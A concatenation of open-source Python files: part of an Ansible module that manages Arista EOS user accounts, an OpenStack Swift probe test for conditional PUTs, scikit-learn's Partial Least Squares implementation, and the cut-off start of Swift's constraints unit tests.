configuration and when set to I(absent) the username(s) should not be
in the device active configuration
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: create a new user
eos_user:
username: ansible
sshkey: "{{ lookup('file', '~/.ssh/id_rsa.pub') }}"
state: present
- name: remove all users except admin
eos_user:
purge: yes
- name: set multiple users to privilege level 15
eos_user:
users:
- username: netop
- username: netend
privilege: 15
state: present
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- username ansible secret password
- username admin secret admin
session_name:
description: The EOS config session name used to load the configuration
returned: when changed is True
type: str
sample: ansible_1479315771
"""
import re
from functools import partial
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.eos import get_config, load_config
from ansible.module_utils.six import iteritems
from ansible.module_utils.eos import eos_argument_spec, check_args
def validate_privilege(value, module):
if not 1 <= value <= 15:
module.fail_json(msg='privilege must be between 1 and 15, got %s' % value)
def map_obj_to_commands(updates, module):
commands = list()
state = module.params['state']
update_password = module.params['update_password']
for update in updates:
want, have = update
needs_update = lambda x: want.get(x) and (want.get(x) != have.get(x))
add = lambda x: commands.append('username %s %s' % (want['username'], x))
if want['state'] == 'absent':
commands.append('no username %s' % want['username'])
continue
if needs_update('role'):
add('role %s' % want['role'])
if needs_update('privilege'):
add('privilege %s' % want['privilege'])
if needs_update('password'):
if update_password == 'always' or not have:
add('secret %s' % want['password'])
if needs_update('sshkey'):
add('sshkey %s' % want['sshkey'])
if needs_update('nopassword'):
if want['nopassword']:
add('nopassword')
else:
add('no username %s nopassword' % want['username'])
return commands
def parse_role(data):
match = re.search(r'role (\S+)', data, re.M)
if match:
return match.group(1)
def parse_sshkey(data):
match = re.search(r'sshkey (.+)$', data, re.M)
if match:
return match.group(1)
def parse_privilege(data):
match = re.search(r'privilege (\S+)', data, re.M)
if match:
return int(match.group(1))
def map_config_to_obj(module):
data = get_config(module, flags=['section username'])
match = re.findall(r'^username (\S+)', data, re.M)
if not match:
return list()
instances = list()
for user in set(match):
regex = r'username %s .+$' % user
cfg = re.findall(r'username %s .+$' % user, data, re.M)
cfg = '\n'.join(cfg)
obj = {
'username': user,
'state': 'present',
'nopassword': 'nopassword' in cfg,
'password': None,
'sshkey': parse_sshkey(cfg),
'privilege': parse_privilege(cfg),
'role': parse_role(cfg)
}
instances.append(obj)
return instances
def get_param_value(key, item, module):
# if key doesn't exist in the item, get it from module.params
if not item.get(key):
value = module.params[key]
# if key does exist, do a type check on it to validate it
else:
value_type = module.argument_spec[key].get('type', 'str')
type_checker = module._CHECK_ARGUMENT_TYPES_DISPATCHER[value_type]
type_checker(item[key])
value = item[key]
# validate the param value (if validator func exists)
validator = globals().get('validate_%s' % key)
if all((value, validator)):
validator(value, module)
return value
def map_params_to_obj(module):
users = module.params['users']
if not users:
if not module.params['username'] and module.params['purge']:
return list()
elif not module.params['username']:
module.fail_json(msg='username is required')
else:
collection = [{'username': module.params['username']}]
else:
collection = list()
for item in users:
if not isinstance(item, dict):
collection.append({'username': item})
elif 'username' not in item:
module.fail_json(msg='username is required')
else:
collection.append(item)
objects = list()
for item in collection:
get_value = partial(get_param_value, item=item, module=module)
item['password'] = get_value('password')
item['nopassword'] = get_value('nopassword')
item['privilege'] = get_value('privilege')
item['role'] = get_value('role')
item['sshkey'] = get_value('sshkey')
item['state'] = get_value('state')
objects.append(item)
return objects
def update_objects(want, have):
updates = list()
for entry in want:
item = next((i for i in have if i['username'] == entry['username']), None)
if all((item is None, entry['state'] == 'present')):
updates.append((entry, {}))
elif item:
for key, value in iteritems(entry):
if value and value != item[key]:
updates.append((entry, item))
return updates
def main():
""" main entry point for module execution
"""
argument_spec = dict(
users=dict(type='list'),
username=dict(),
password=dict(no_log=True),
nopassword=dict(type='bool'),
update_password=dict(default='always', choices=['on_create', 'always']),
privilege=dict(type='int'),
role=dict(),
sshkey=dict(),
purge=dict(type='bool', default=False),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(eos_argument_spec)
mutually_exclusive = [('username', 'users')]
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = map_config_to_obj(module)
commands = map_obj_to_commands(update_objects(want, have), module)
if module.params['purge']:
want_users = [x['username'] for x in want]
have_users = [x['username'] for x in have]
for item in set(have_users).difference(want_users):
if item != 'admin':
commands.append('no username %s' % item)
result['commands'] = commands
# the eos cli prevents this by rule so capture it and display
# a nice failure message
if 'no username admin' in commands:
module.fail_json(msg='cannot delete the `admin` account')
if commands:
commit = not module.check_mode
response = load_config(module, commands, commit=commit)
if response.get('diff') and module._diff:
result['diff'] = {'prepared': response.get('diff')}
result['session_name'] = response.get('session')
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
swiftstack/swift | test/probe/test_object_conditional_requests.py | 3 | 2859 | # Copyright (c) 2017 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from swift.common.manager import Manager
from swiftclient import client
from test.probe.brain import BrainSplitter
from test.probe.common import ReplProbeTest
def chunker(body):
'''Helper to ensure swiftclient sends a chunked request.'''
yield body
class TestPutIfNoneMatchRepl(ReplProbeTest):
def setUp(self):
super(TestPutIfNoneMatchRepl, self).setUp()
self.container_name = 'container-%s' % uuid.uuid4()
self.object_name = 'object-%s' % uuid.uuid4()
self.brain = BrainSplitter(self.url, self.token, self.container_name,
self.object_name, 'object',
policy=self.policy)
def _do_test(self, overwrite_contents):
self.brain.put_container()
self.brain.stop_primary_half()
# put object to only 1 of 3 primaries
self.brain.put_object(contents=b'VERIFY')
self.brain.start_primary_half()
# Restart services and attempt to overwrite
with self.assertRaises(client.ClientException) as exc_mgr:
self.brain.put_object(headers={'If-None-Match': '*'},
contents=overwrite_contents)
self.assertEqual(exc_mgr.exception.http_status, 412)
# make sure we're GETting from the servers that missed the original PUT
self.brain.stop_handoff_half()
# verify the PUT did not complete
with self.assertRaises(client.ClientException) as exc_mgr:
client.get_object(
self.url, self.token, self.container_name, self.object_name)
self.assertEqual(exc_mgr.exception.http_status, 404)
# for completeness, run replicators...
Manager(['object-replicator']).once()
# ...and verify the object was not overwritten
_headers, body = client.get_object(
self.url, self.token, self.container_name, self.object_name)
self.assertEqual(body, b'VERIFY')
def test_content_length_nonzero(self):
self._do_test(b'OVERWRITE')
def test_content_length_zero(self):
self._do_test(b'')
def test_chunked(self):
self._do_test(chunker(b'OVERWRITE'))
def test_chunked_empty(self):
self._do_test(chunker(b''))
| apache-2.0 |
yask123/scikit-learn | sklearn/cross_decomposition/pls_.py | 187 | 28507 | """
The :mod:`sklearn.pls` module implements Partial Least Squares (PLS).
"""
# Author: Edouard Duchesnay <edouard.duchesnay@cea.fr>
# License: BSD 3 clause
from ..base import BaseEstimator, RegressorMixin, TransformerMixin
from ..utils import check_array, check_consistent_length
from ..externals import six
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import linalg
from ..utils import arpack
from ..utils.validation import check_is_fitted
__all__ = ['PLSCanonical', 'PLSRegression', 'PLSSVD']
def _nipals_twoblocks_inner_loop(X, Y, mode="A", max_iter=500, tol=1e-06,
norm_y_weights=False):
"""Inner loop of the iterative NIPALS algorithm.
Provides an alternative to the svd(X'Y); returns the first left and right
singular vectors of X'Y. See PLS for the meaning of the parameters. It is
similar to the Power method for determining the eigenvectors and
eigenvalues of a X'Y.
"""
y_score = Y[:, [0]]
x_weights_old = 0
ite = 1
X_pinv = Y_pinv = None
eps = np.finfo(X.dtype).eps
# Inner loop of the Wold algo.
while True:
# 1.1 Update u: the X weights
if mode == "B":
if X_pinv is None:
X_pinv = linalg.pinv(X) # compute once pinv(X)
x_weights = np.dot(X_pinv, y_score)
else: # mode A
# Mode A regress each X column on y_score
x_weights = np.dot(X.T, y_score) / np.dot(y_score.T, y_score)
# 1.2 Normalize u
x_weights /= np.sqrt(np.dot(x_weights.T, x_weights)) + eps
# 1.3 Update x_score: the X latent scores
x_score = np.dot(X, x_weights)
# 2.1 Update y_weights
if mode == "B":
if Y_pinv is None:
Y_pinv = linalg.pinv(Y) # compute once pinv(Y)
y_weights = np.dot(Y_pinv, x_score)
else:
# Mode A regress each Y column on x_score
y_weights = np.dot(Y.T, x_score) / np.dot(x_score.T, x_score)
# 2.2 Normalize y_weights
if norm_y_weights:
y_weights /= np.sqrt(np.dot(y_weights.T, y_weights)) + eps
# 2.3 Update y_score: the Y latent scores
y_score = np.dot(Y, y_weights) / (np.dot(y_weights.T, y_weights) + eps)
# y_score = np.dot(Y, y_weights) / np.dot(y_score.T, y_score) ## BUG
x_weights_diff = x_weights - x_weights_old
if np.dot(x_weights_diff.T, x_weights_diff) < tol or Y.shape[1] == 1:
break
if ite == max_iter:
warnings.warn('Maximum number of iterations reached')
break
x_weights_old = x_weights
ite += 1
return x_weights, y_weights, ite
def _svd_cross_product(X, Y):
C = np.dot(X.T, Y)
U, s, Vh = linalg.svd(C, full_matrices=False)
u = U[:, [0]]
v = Vh.T[:, [0]]
return u, v
def _center_scale_xy(X, Y, scale=True):
""" Center X, Y and scale if the scale parameter==True
Returns
-------
X, Y, x_mean, y_mean, x_std, y_std
"""
# center
x_mean = X.mean(axis=0)
X -= x_mean
y_mean = Y.mean(axis=0)
Y -= y_mean
# scale
if scale:
x_std = X.std(axis=0, ddof=1)
x_std[x_std == 0.0] = 1.0
X /= x_std
y_std = Y.std(axis=0, ddof=1)
y_std[y_std == 0.0] = 1.0
Y /= y_std
else:
x_std = np.ones(X.shape[1])
y_std = np.ones(Y.shape[1])
return X, Y, x_mean, y_mean, x_std, y_std
class _PLS(six.with_metaclass(ABCMeta), BaseEstimator, TransformerMixin,
RegressorMixin):
"""Partial Least Squares (PLS)
This class implements the generic PLS algorithm, constructors' parameters
allow to obtain a specific implementation such as:
- PLS2 regression, i.e., PLS 2 blocks, mode A, with asymmetric deflation
and unnormalized y weights such as defined by [Tenenhaus 1998] p. 132.
With univariate response it implements PLS1.
- PLS canonical, i.e., PLS 2 blocks, mode A, with symmetric deflation and
normalized y weights such as defined by [Tenenhaus 1998] (p. 132) and
[Wegelin et al. 2000]. This parametrization implements the original Wold
algorithm.
We use the terminology defined by [Wegelin et al. 2000].
This implementation uses the PLS Wold 2 blocks algorithm based on two
nested loops:
(i) The outer loop iterate over components.
(ii) The inner loop estimates the weights vectors. This can be done
with two algo. (a) the inner loop of the original NIPALS algo. or (b) a
SVD on residuals cross-covariance matrices.
n_components : int, number of components to keep. (default 2).
scale : boolean, scale data? (default True)
deflation_mode : str, "canonical" or "regression". See notes.
mode : "A" classical PLS and "B" CCA. See notes.
norm_y_weights: boolean, normalize Y weights to one? (default False)
algorithm : string, "nipals" or "svd"
The algorithm used to estimate the weights. It will be called
n_components times, i.e. once for each iteration of the outer loop.
max_iter : an integer, the maximum number of iterations (default 500)
of the NIPALS inner loop (used only if algorithm="nipals")
tol : non-negative real, default 1e-06
The tolerance used in the iterative algorithm.
copy : boolean, default True
Whether the deflation should be done on a copy. Let the default
value to True unless you don't care about side effects.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
coef_: array, [p, q]
The coefficients of the linear model: ``Y = X coef_ + Err``
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component. Not useful if the algorithm given is "svd".
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
In French but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
See also
--------
PLSCanonical
PLSRegression
CCA
PLS_SVD
"""
@abstractmethod
def __init__(self, n_components=2, scale=True, deflation_mode="regression",
mode="A", algorithm="nipals", norm_y_weights=False,
max_iter=500, tol=1e-06, copy=True):
self.n_components = n_components
self.deflation_mode = deflation_mode
self.mode = mode
self.norm_y_weights = norm_y_weights
self.scale = scale
self.algorithm = algorithm
self.max_iter = max_iter
self.tol = tol
self.copy = copy
def fit(self, X, Y):
"""Fit model to data.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples in the number of samples and
n_features is the number of predictors.
Y : array-like of response, shape = [n_samples, n_targets]
Target vectors, where n_samples in the number of samples and
n_targets is the number of response variables.
"""
# copy since this will contains the residuals (deflated) matrices
check_consistent_length(X, Y)
X = check_array(X, dtype=np.float64, copy=self.copy)
Y = check_array(Y, dtype=np.float64, copy=self.copy, ensure_2d=False)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
n = X.shape[0]
p = X.shape[1]
q = Y.shape[1]
if self.n_components < 1 or self.n_components > p:
raise ValueError('Invalid number of components: %d' %
self.n_components)
if self.algorithm not in ("svd", "nipals"):
raise ValueError("Got algorithm %s when only 'svd' "
"and 'nipals' are known" % self.algorithm)
if self.algorithm == "svd" and self.mode == "B":
raise ValueError('Incompatible configuration: mode B is not '
'implemented with svd algorithm')
if self.deflation_mode not in ["canonical", "regression"]:
raise ValueError('The deflation mode is unknown')
# Scale (in place)
X, Y, self.x_mean_, self.y_mean_, self.x_std_, self.y_std_\
= _center_scale_xy(X, Y, self.scale)
# Residuals (deflated) matrices
Xk = X
Yk = Y
# Results matrices
self.x_scores_ = np.zeros((n, self.n_components))
self.y_scores_ = np.zeros((n, self.n_components))
self.x_weights_ = np.zeros((p, self.n_components))
self.y_weights_ = np.zeros((q, self.n_components))
self.x_loadings_ = np.zeros((p, self.n_components))
self.y_loadings_ = np.zeros((q, self.n_components))
self.n_iter_ = []
# NIPALS algo: outer loop, over components
for k in range(self.n_components):
if np.all(np.dot(Yk.T, Yk) < np.finfo(np.double).eps):
# Yk constant
warnings.warn('Y residual constant at iteration %s' % k)
break
# 1) weights estimation (inner loop)
# -----------------------------------
if self.algorithm == "nipals":
x_weights, y_weights, n_iter_ = \
_nipals_twoblocks_inner_loop(
X=Xk, Y=Yk, mode=self.mode, max_iter=self.max_iter,
tol=self.tol, norm_y_weights=self.norm_y_weights)
self.n_iter_.append(n_iter_)
elif self.algorithm == "svd":
x_weights, y_weights = _svd_cross_product(X=Xk, Y=Yk)
# compute scores
x_scores = np.dot(Xk, x_weights)
if self.norm_y_weights:
y_ss = 1
else:
y_ss = np.dot(y_weights.T, y_weights)
y_scores = np.dot(Yk, y_weights) / y_ss
# test for null variance
if np.dot(x_scores.T, x_scores) < np.finfo(np.double).eps:
warnings.warn('X scores are null at iteration %s' % k)
break
# 2) Deflation (in place)
# ----------------------
# Possible memory footprint reduction may done here: in order to
# avoid the allocation of a data chunk for the rank-one
# approximations matrix which is then subtracted to Xk, we suggest
# to perform a column-wise deflation.
#
# - regress Xk's on x_score
x_loadings = np.dot(Xk.T, x_scores) / np.dot(x_scores.T, x_scores)
# - subtract rank-one approximations to obtain remainder matrix
Xk -= np.dot(x_scores, x_loadings.T)
if self.deflation_mode == "canonical":
# - regress Yk's on y_score, then subtract rank-one approx.
y_loadings = (np.dot(Yk.T, y_scores)
/ np.dot(y_scores.T, y_scores))
Yk -= np.dot(y_scores, y_loadings.T)
if self.deflation_mode == "regression":
# - regress Yk's on x_score, then subtract rank-one approx.
y_loadings = (np.dot(Yk.T, x_scores)
/ np.dot(x_scores.T, x_scores))
Yk -= np.dot(x_scores, y_loadings.T)
# 3) Store weights, scores and loadings # Notation:
self.x_scores_[:, k] = x_scores.ravel() # T
self.y_scores_[:, k] = y_scores.ravel() # U
self.x_weights_[:, k] = x_weights.ravel() # W
self.y_weights_[:, k] = y_weights.ravel() # C
self.x_loadings_[:, k] = x_loadings.ravel() # P
self.y_loadings_[:, k] = y_loadings.ravel() # Q
# Such that: X = TP' + Err and Y = UQ' + Err
# 4) rotations from input space to transformed space (scores)
# T = X W(P'W)^-1 = XW* (W* : p x k matrix)
# U = Y C(Q'C)^-1 = YC* (W* : q x k matrix)
self.x_rotations_ = np.dot(
self.x_weights_,
linalg.pinv(np.dot(self.x_loadings_.T, self.x_weights_)))
if Y.shape[1] > 1:
self.y_rotations_ = np.dot(
self.y_weights_,
linalg.pinv(np.dot(self.y_loadings_.T, self.y_weights_)))
else:
self.y_rotations_ = np.ones(1)
if True or self.deflation_mode == "regression":
# FIXME what's with the if?
# Estimate regression coefficient
# Regress Y on T
# Y = TQ' + Err,
# Then express in function of X
# Y = X W(P'W)^-1Q' + Err = XB + Err
# => B = W*Q' (p x q)
self.coef_ = np.dot(self.x_rotations_, self.y_loadings_.T)
self.coef_ = (1. / self.x_std_.reshape((p, 1)) * self.coef_ *
self.y_std_)
return self
def transform(self, X, Y=None, copy=True):
"""Apply the dimension reduction learned on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
Training vectors, where n_samples in the number of samples and
p is the number of predictors.
Y : array-like of response, shape = [n_samples, q], optional
Training vectors, where n_samples in the number of samples and
q is the number of response variables.
copy : boolean, default True
Whether to copy X and Y, or perform in-place normalization.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
check_is_fitted(self, 'x_mean_')
X = check_array(X, copy=copy)
# Normalize
X -= self.x_mean_
X /= self.x_std_
# Apply rotation
x_scores = np.dot(X, self.x_rotations_)
if Y is not None:
Y = check_array(Y, ensure_2d=False, copy=copy)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
Y -= self.y_mean_
Y /= self.y_std_
y_scores = np.dot(Y, self.y_rotations_)
return x_scores, y_scores
return x_scores
def predict(self, X, copy=True):
"""Apply the dimension reduction learned on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
Training vectors, where n_samples in the number of samples and
p is the number of predictors.
copy : boolean, default True
Whether to copy X and Y, or perform in-place normalization.
Notes
-----
This call requires the estimation of a p x q matrix, which may
be an issue in high dimensional space.
"""
check_is_fitted(self, 'x_mean_')
X = check_array(X, copy=copy)
# Normalize
X -= self.x_mean_
X /= self.x_std_
Ypred = np.dot(X, self.coef_)
return Ypred + self.y_mean_
def fit_transform(self, X, y=None, **fit_params):
"""Learn and apply the dimension reduction on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
Training vectors, where n_samples in the number of samples and
p is the number of predictors.
Y : array-like of response, shape = [n_samples, q], optional
Training vectors, where n_samples in the number of samples and
q is the number of response variables.
copy : boolean, default True
Whether to copy X and Y, or perform in-place normalization.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
check_is_fitted(self, 'x_mean_')
return self.fit(X, y, **fit_params).transform(X, y)
class PLSRegression(_PLS):
"""PLS regression
PLSRegression implements the PLS 2 blocks regression known as PLS2 or PLS1
in case of one dimensional response.
This class inherits from _PLS with mode="A", deflation_mode="regression",
norm_y_weights=False and algorithm="nipals".
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, (default 2)
Number of components to keep.
scale : boolean, (default True)
whether to scale the data
max_iter : an integer, (default 500)
the maximum number of iterations of the NIPALS inner loop (used
only if algorithm="nipals")
tol : non-negative real
Tolerance used in the iterative algorithm default 1e-06.
copy : boolean, default True
Whether the deflation should be done on a copy. Let the default
value to True unless you don't care about side effect
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_loadings_ : array, [p, n_components]
X block loadings vectors.
y_loadings_ : array, [q, n_components]
Y block loadings vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
x_rotations_ : array, [p, n_components]
X block to latents rotations.
y_rotations_ : array, [q, n_components]
Y block to latents rotations.
coef_: array, [p, q]
The coefficients of the linear model: ``Y = X coef_ + Err``
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component.
Notes
-----
For each component k, find weights u, v that optimizes:
``max corr(Xk u, Yk v) * var(Xk u) var(Yk u)``, such that ``|u| = 1``
Note that it maximizes both the correlations between the scores and the
intra-block variances.
The residual matrix of X (Xk+1) block is obtained by the deflation on
the current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current X score. This performs the PLS regression known as PLS2. This
mode is prediction oriented.
This implementation provides the same results that 3 PLS packages
provided in the R language (R-project):
- "mixOmics" with function pls(X, Y, mode = "regression")
- "plspm " with function plsreg2(X, Y)
- "pls" with function oscorespls.fit(X, Y)
Examples
--------
>>> from sklearn.cross_decomposition import PLSRegression
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [2.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
>>> pls2 = PLSRegression(n_components=2)
>>> pls2.fit(X, Y)
... # doctest: +NORMALIZE_WHITESPACE
PLSRegression(copy=True, max_iter=500, n_components=2, scale=True,
tol=1e-06)
>>> Y_pred = pls2.predict(X)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
In french but still a reference:
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
"""
def __init__(self, n_components=2, scale=True,
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="regression", mode="A",
norm_y_weights=False, max_iter=max_iter, tol=tol,
copy=copy)
class PLSCanonical(_PLS):
""" PLSCanonical implements the 2 blocks canonical PLS of the original Wold
algorithm [Tenenhaus 1998] p.204, referred as PLS-C2A in [Wegelin 2000].
This class inherits from PLS with mode="A" and deflation_mode="canonical",
norm_y_weights=True and algorithm="nipals", but svd should provide similar
results up to numerical errors.
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
scale : boolean, scale data? (default True)
algorithm : string, "nipals" or "svd"
The algorithm used to estimate the weights. It will be called
n_components times, i.e. once for each iteration of the outer loop.
max_iter : an integer, (default 500)
the maximum number of iterations of the NIPALS inner loop (used
only if algorithm="nipals")
tol : non-negative real, default 1e-06
the tolerance used in the iterative algorithm
copy : boolean, default True
Whether the deflation should be done on a copy. Let the default
value to True unless you don't care about side effect
n_components : int, number of components to keep. (default 2).
Attributes
----------
x_weights_ : array, shape = [p, n_components]
X block weights vectors.
y_weights_ : array, shape = [q, n_components]
Y block weights vectors.
x_loadings_ : array, shape = [p, n_components]
X block loadings vectors.
y_loadings_ : array, shape = [q, n_components]
Y block loadings vectors.
x_scores_ : array, shape = [n_samples, n_components]
X scores.
y_scores_ : array, shape = [n_samples, n_components]
Y scores.
x_rotations_ : array, shape = [p, n_components]
X block to latents rotations.
y_rotations_ : array, shape = [q, n_components]
Y block to latents rotations.
n_iter_ : array-like
Number of iterations of the NIPALS inner loop for each
component. Not useful if the algorithm provided is "svd".
Notes
-----
For each component k, find weights u, v that optimize::
max corr(Xk u, Yk v) * var(Xk u) var(Yk u), such that ``|u| = |v| = 1``
Note that it maximizes both the correlations between the scores and the
intra-block variances.
The residual matrix of X (Xk+1) block is obtained by the deflation on the
current X score: x_score.
The residual matrix of Y (Yk+1) block is obtained by deflation on the
current Y score. This performs a canonical symmetric version of the PLS
regression. But slightly different than the CCA. This is mostly used
for modeling.
This implementation provides the same results that the "plspm" package
provided in the R language (R-project), using the function plsca(X, Y).
Results are equal or collinear with the function
``pls(..., mode = "canonical")`` of the "mixOmics" package. The difference
relies in the fact that mixOmics implementation does not exactly implement
the Wold algorithm since it does not normalize y_weights to one.
Examples
--------
>>> from sklearn.cross_decomposition import PLSCanonical
>>> X = [[0., 0., 1.], [1.,0.,0.], [2.,2.,2.], [2.,5.,4.]]
>>> Y = [[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]]
>>> plsca = PLSCanonical(n_components=2)
>>> plsca.fit(X, Y)
... # doctest: +NORMALIZE_WHITESPACE
PLSCanonical(algorithm='nipals', copy=True, max_iter=500, n_components=2,
scale=True, tol=1e-06)
>>> X_c, Y_c = plsca.transform(X, Y)
References
----------
Jacob A. Wegelin. A survey of Partial Least Squares (PLS) methods, with
emphasis on the two-block case. Technical Report 371, Department of
Statistics, University of Washington, Seattle, 2000.
Tenenhaus, M. (1998). La regression PLS: theorie et pratique. Paris:
Editions Technic.
See also
--------
CCA
PLSSVD
"""
def __init__(self, n_components=2, scale=True, algorithm="nipals",
max_iter=500, tol=1e-06, copy=True):
_PLS.__init__(self, n_components=n_components, scale=scale,
deflation_mode="canonical", mode="A",
norm_y_weights=True, algorithm=algorithm,
max_iter=max_iter, tol=tol, copy=copy)
class PLSSVD(BaseEstimator, TransformerMixin):
"""Partial Least Square SVD
Simply perform a svd on the crosscovariance matrix: X'Y
There are no iterative deflation here.
Read more in the :ref:`User Guide <cross_decomposition>`.
Parameters
----------
n_components : int, default 2
Number of components to keep.
scale : boolean, default True
Whether to scale X and Y.
copy : boolean, default True
Whether to copy X and Y, or perform in-place computations.
Attributes
----------
x_weights_ : array, [p, n_components]
X block weights vectors.
y_weights_ : array, [q, n_components]
Y block weights vectors.
x_scores_ : array, [n_samples, n_components]
X scores.
y_scores_ : array, [n_samples, n_components]
Y scores.
See also
--------
PLSCanonical
CCA
"""
def __init__(self, n_components=2, scale=True, copy=True):
self.n_components = n_components
self.scale = scale
self.copy = copy
def fit(self, X, Y):
# copy since this will contains the centered data
check_consistent_length(X, Y)
X = check_array(X, dtype=np.float64, copy=self.copy)
Y = check_array(Y, dtype=np.float64, copy=self.copy, ensure_2d=False)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
if self.n_components > max(Y.shape[1], X.shape[1]):
raise ValueError("Invalid number of components n_components=%d"
" with X of shape %s and Y of shape %s."
% (self.n_components, str(X.shape), str(Y.shape)))
# Scale (in place)
X, Y, self.x_mean_, self.y_mean_, self.x_std_, self.y_std_ =\
_center_scale_xy(X, Y, self.scale)
# svd(X'Y)
C = np.dot(X.T, Y)
# The arpack svds solver only works if the number of extracted
# components is smaller than rank(X) - 1. Hence, if we want to extract
# all the components (C.shape[1]), we have to use another one. Else,
# let's use arpacks to compute only the interesting components.
if self.n_components >= np.min(C.shape):
U, s, V = linalg.svd(C, full_matrices=False)
else:
U, s, V = arpack.svds(C, k=self.n_components)
V = V.T
self.x_scores_ = np.dot(X, U)
self.y_scores_ = np.dot(Y, V)
self.x_weights_ = U
self.y_weights_ = V
return self
def transform(self, X, Y=None):
"""Apply the dimension reduction learned on the train data."""
check_is_fitted(self, 'x_mean_')
X = check_array(X, dtype=np.float64)
Xr = (X - self.x_mean_) / self.x_std_
x_scores = np.dot(Xr, self.x_weights_)
if Y is not None:
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
Yr = (Y - self.y_mean_) / self.y_std_
y_scores = np.dot(Yr, self.y_weights_)
return x_scores, y_scores
return x_scores
def fit_transform(self, X, y=None, **fit_params):
"""Learn and apply the dimension reduction on the train data.
Parameters
----------
X : array-like of predictors, shape = [n_samples, p]
Training vectors, where n_samples in the number of samples and
p is the number of predictors.
Y : array-like of response, shape = [n_samples, q], optional
Training vectors, where n_samples in the number of samples and
q is the number of response variables.
Returns
-------
x_scores if Y is not given, (x_scores, y_scores) otherwise.
"""
return self.fit(X, y, **fit_params).transform(X, y)
| bsd-3-clause |
hurricanerix/swift | test/unit/common/test_constraints.py | 2 | 25596 | # Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
import tempfile
import time
from six.moves import range
from test import safe_repr
from test.unit import MockTrue
from swift.common.swob import Request, HTTPException
from swift.common.http import HTTP_REQUEST_ENTITY_TOO_LARGE, \
HTTP_BAD_REQUEST, HTTP_LENGTH_REQUIRED, HTTP_NOT_IMPLEMENTED
from swift.common import constraints, utils
from swift.common.constraints import MAX_OBJECT_NAME_LENGTH
class TestConstraints(unittest.TestCase):
def assertIn(self, member, container, msg=None):
"""Copied from 2.7"""
if member not in container:
standardMsg = '%s not found in %s' % (safe_repr(member),
safe_repr(container))
self.fail(self._formatMessage(msg, standardMsg))
def test_check_metadata_empty(self):
headers = {}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
def test_check_metadata_good(self):
headers = {'X-Object-Meta-Name': 'Value'}
self.assertEqual(constraints.check_metadata(Request.blank(
'/', headers=headers), 'object'), None)
def test_check_metadata_empty_name(self):
headers = {'X-Object-Meta-': 'Value'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'object')
self.assertEqual(resp.status_int, HTTP_BAD_REQUEST)
self.assertIn('Metadata name cannot be empty', resp.body)
def test_check_metadata_non_utf8(self):
headers = {'X-Account-Meta-Foo': b'\xff'}
resp = constraints.check_metadata(Request.blank(
'/', headers=headers), 'account')
